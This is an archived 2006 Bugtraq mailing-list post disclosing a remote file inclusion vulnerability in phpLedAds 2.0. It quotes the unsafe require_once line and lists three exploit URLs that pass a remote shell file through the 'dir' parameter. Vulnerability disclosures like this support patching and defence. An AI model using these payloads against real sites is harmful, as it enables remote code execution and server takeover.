| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri, 27 Oct 2006 18:10:40 +0000 From: "mahmood ali" <mah_k_2000@...mail.com> To: bugtraq@...urityfocus.com Subject: phpLedAds 2.0(dir) File Include ################################################### phpLedAds 2.0(dir) File Include ################################################### Source Code: ftp://ftp1.comscripts.com/PHP/175_phpledad-20.zip ################################################### Vulnerable Code:_ click.php & ledad.php & ledad_js.php ################################################### In Line 41 :_ require_once($dir . '/ad_class.php'); ################################################### Exploit :_ http://www.VicTim.com/[ledads]/click.php?dir=Sh3ll.txt? http://www.VicTim.com/[ledads]/ledad.php?dir=Sh3ll.txt? http://www.VicTim.com/[ledads]/ledad_js.php?dir=Sh3ll.txt? ################################################### Discoverd By : Mahmood_ali ################################################### Special Greetings :_ Tryag-Team & 4lKaSrGoLd3n-Team > WwW.DwRaT.CoM & WwW.Tryag.CoM ################################################### _________________________________________________________________ Windows Live™ Messenger has arrived. Click here to download it for free! http://imagine-msn.com/messenger/launch80/?locale=en-gb
Powered by blists - more mailing lists